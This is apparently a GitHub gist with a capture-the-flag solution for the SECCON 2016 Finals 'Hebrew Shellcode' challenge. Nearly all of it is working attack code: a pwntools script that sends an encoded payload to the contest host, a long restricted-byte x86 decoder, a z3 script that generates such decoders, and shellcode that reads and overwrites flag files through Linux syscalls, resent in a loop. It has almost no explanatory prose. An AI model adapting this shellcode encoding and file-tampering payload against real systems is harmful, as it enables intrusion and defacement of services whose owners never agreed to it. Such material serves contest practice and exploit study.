Create a gist now

Instantly share code, notes, and snippets.

@rekkusu /attack.py Secret
Last active Feb 5, 2017

What would you like to do?
[SECCON 2016 Finals] Server 5: Hebrew Shellcode
def encode(code):
result = "";
for c in map(ord, code):
h = ((c & 0xf0) >> 4) + 0xD0
result += chr(h) + '\x05'
l = (c & 0x0f) + 0xD0
result += chr(l) + '\x05'
return result
buffer = open('buffer', 'rb').read()
decoder = open('decoder', 'rb').read()
payload = ""
payload += buffer # add eax, 0xc40
payload += '\x21\xfb' # and ebx, edi
payload += '\xb7\x05' # mov bh, 0x5
payload += '\x31\xfb' # xor ebx, edi
payload += '\x97' # xchg eax, edi
payload += decoder
payload += '\x05\x2c\xfb\x30\xfb' # glue (aa 05)
payload += '\x2c\xfb' * ((3184 - len(payload)) / 2) # padding
payload += encode(open('flag', 'rb').read()) # shellcode
from pwn import *
s = remote('5.finals.seccon.jp', 12345)
s.send(payload + '\n')
s.interactive()
BITS 32
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb20fb30
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005d0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb2005e0
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb20
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0xfb3005e0
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d0fb30
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5d005e0
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e0fb20
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
cdq
add eax, 0x5e005d0
BITS 32
add eax, 0xfb30fb2e
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005d8
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005dc
stosb
add eax, 0xfb30fb25
cdq
add eax, 0xfb30fb2d
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d6
cdq
add eax, 0xfb3005d6
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005dc
stosb
add eax, 0xfb30fb25
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005d7
stosb
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb23
cdq
add eax, 0xfb30fb23
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005d7
stosb
add eax, 0xfb30fb25
cdq
add eax, 0xfb30fb2d
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb26
cdq
add eax, 0xfb30fb27
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005d2
stosb
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005d7
stosb
add eax, 0xfb30fb24
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb2d
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005db
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb2b
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005dd
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d3
stosb
add eax, 0xfb30fb2a
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005d7
stosb
add eax, 0xfb30fb28
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005db
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb21
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005dd
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb2c
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d0
stosb
add eax, 0xfb30fb23
cdq
add eax, 0xfb3005d9
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb24
cdq
add eax, 0xfb30fb28
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb30fb2b
stosb
add eax, 0xfb30fb2a
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb30fb2d
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d2
stosb
add eax, 0xfb30fb22
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d1
stosb
add eax, 0xfb30fb2b
cdq
add eax, 0xfb30fb2c
cdq
add eax, 0xfb30fb2d
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb21
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb20
cdq
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005d5
stosb
add eax, 0xfb30fb27
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb27
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb21
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d2
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb2d
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005dc
cdq
add eax, 0xfb3005dd
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb26
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d2
cdq
add eax, 0xfb3005d2
stosb
add eax, 0xfb30fb2a
cdq
add eax, 0xfb3005d9
cdq
add eax, 0xfb3005dc
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005d7
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb3005dc
cdq
add eax, 0xfb3005dc
stosb
add eax, 0xfb3005d1
cdq
add eax, 0xfb3005d9
cdq
add eax, 0xfb3005d9
cdq
add eax, 0xfb3005db
cdq
add eax, 0xfb3005dd
stosb
add eax, 0xfb3005d8
cdq
add eax, 0xfb3005da
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb24
cdq
add eax, 0xfb30fb28
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb30fb2b
stosb
add eax, 0xfb30fb2c
cdq
add eax, 0xfb3005d3
cdq
add eax, 0xfb3005d8
cdq
add eax, 0xfb3005de
cdq
add eax, 0xfb3005de
stosb
add eax, 0xfb30fb28
cdq
add eax, 0xfb30fb2a
cdq
add eax, 0xfb3005d4
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb26
cdq
add eax, 0xfb30fb26
cdq
add eax, 0xfb3005d5
cdq
add eax, 0xfb3005da
stosb
add eax, 0xfb30fb2c
cdq
add eax, 0xfb30fb2e
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d8
stosb
add eax, 0xfb30fb28
cdq
add eax, 0xfb30fb2b
cdq
add eax, 0xfb3005dc
cdq
add eax, 0xfb3005dc
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb3005d2
cdq
add eax, 0xfb3005d6
cdq
add eax, 0xfb3005d6
cdq
add eax, 0xfb3005d7
cdq
add eax, 0xfb3005d8
stosb
add eax, 0xfb30fb21
cdq
add eax, 0xfb30fb21
cdq
add eax, 0xfb3005df
cdq
add eax, 0xfb3005df
stosb
add eax, 0xfb30fb2f
cdq
add eax, 0xfb30fb2f
cdq
add eax, 0xfb3005d0
cdq
add eax, 0xfb3005d2
stosb
from z3 import *
valid = [0xfb20, 0xfb21, 0xfb22, 0xfb23, 0xfb24, 0xfb25, 0xfb26, 0xfb27, 0xfb28, 0xfb2a, 0xfb2b, 0xfb2c, 0xfb2d, 0xfb2e, 0xfb2f, 0x05d0, 0x05d1, 0x05d2, 0x05d3, 0x05d4, 0x05d5, 0x05d6, 0x05d7, 0x05d8, 0x05d9, 0x05da, 0x05db, 0x05dc, 0x05dd, 0x05de, 0x05df]
def search(ch, start=0):
assert 0 <= ch <= 0xFF
xs = [ BitVec('x%02d' % d, 32) for d in range(len(valid)) ]
expr = BitVecVal(start, 32)
for (a, b) in zip(valid, xs):
expr += a * b & 0xFF
s = Solver()
s.add(expr & 0xFF == ch)
expr2 = 0
for x in xs:
s.add(And(x >= 0, x <= 3))
expr2 += x
s.add(And(expr2 > 0, expr2 < 6))
assert s.check() == sat
m = s.model()
result = []
for i in range(len(xs)):
n = m[xs[i]].as_long()
for _ in range(n):
result.append(valid[i])
return result
decoder = open('decoder_sc', 'rb').read()
asm = 'BITS 32\n'
start = 0x00
for c in map(ord, decoder):
r = search(c, start)
flag = False
for a in r:
if flag:
asm += 'cdq\n'
asm += 'add eax, 0xfb30%04x\n' % a
flag = True
asm += 'stosb\n'
asm += '\n'
start = c
print asm
BITS 32
jmp tail
start:
pop eax
mov esi, eax
mov edi, eax
xor ebx, ebx
xor ecx, ecx
mov edx, 0x300
nop
loop:
mov bl, byte [esi]
shl bl, 4
inc esi
inc esi
mov cl, byte [esi]
inc esi
inc esi
and ecx, 0x0f
add ebx, ecx
mov byte [edi], bl
inc edi
dec edx
test edx, edx
je tail2
jmp loop
tail:
call start
tail2:
def get_flag():
import os
flag = open('flagword', 'r').read()
print 'Defense flag:', flag
return flag
def encode(code):
result = "";
for c in map(ord, code):
h = ((c & 0xf0) >> 4) + 0xD0
result += chr(h) + '\x05'
l = (c & 0x0f) + 0xD0
result += chr(l) + '\x05'
return result
buffer = open('buffer', 'rb').read()
decoder = open('decoder', 'rb').read()
defense = open('defense', 'rb').read()
payload = ""
payload += buffer # add eax, 0xc40
payload += '\x21\xfb' # and ebx, edi
payload += '\xb7\x05' # mov bh, 0x5
payload += '\x31\xfb' # xor ebx, edi
payload += '\x97' # xchg eax, edi
payload += decoder
payload += '\x05\x2c\xfb\x30\xfb' # glue (aa 05)
payload += '\x2c\xfb' * ((3184 - len(payload)) / 2) # padding
while True:
s = remote('5.finals.seccon.jp', 12345)
pay = payload + encode(defense + '\n' + get_flag() + '\nAAAAAAAA\0\0\0\0\0\0\0\0')
s.send(pay + '\n')
print s.recv(1024)
s.close()
sleep(60)
BITS 32
jmp fname
start:
pop ebx
mov ecx, 0x401
mov eax, 5
int 0x80
mov ebp, eax
mov ebx, eax
jmp flag
readflag:
pop ecx
mov edx, 0x22
mov eax, 4
int 0x80
mov ebx, ebp
mov eax, 6
int 0x80
mov eax, 1
int 0x80
fname:
call start
db '/usr/share/nginx/html/defense/flag.txt', 0
flag:
call readflag
BITS 32
jmp name
start:
pop ebx
xor ecx, ecx
mov eax, 5
int 0x80
mov ebx, eax
mov ecx, 0x804a2a0
mov edx, 0x60
mov eax, 3
int 0x80
xor ebx, ebx
mov eax, 4
int 0x80
mov eax, 1
int 0x80
name:
call start
db 'keyword.txt', 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment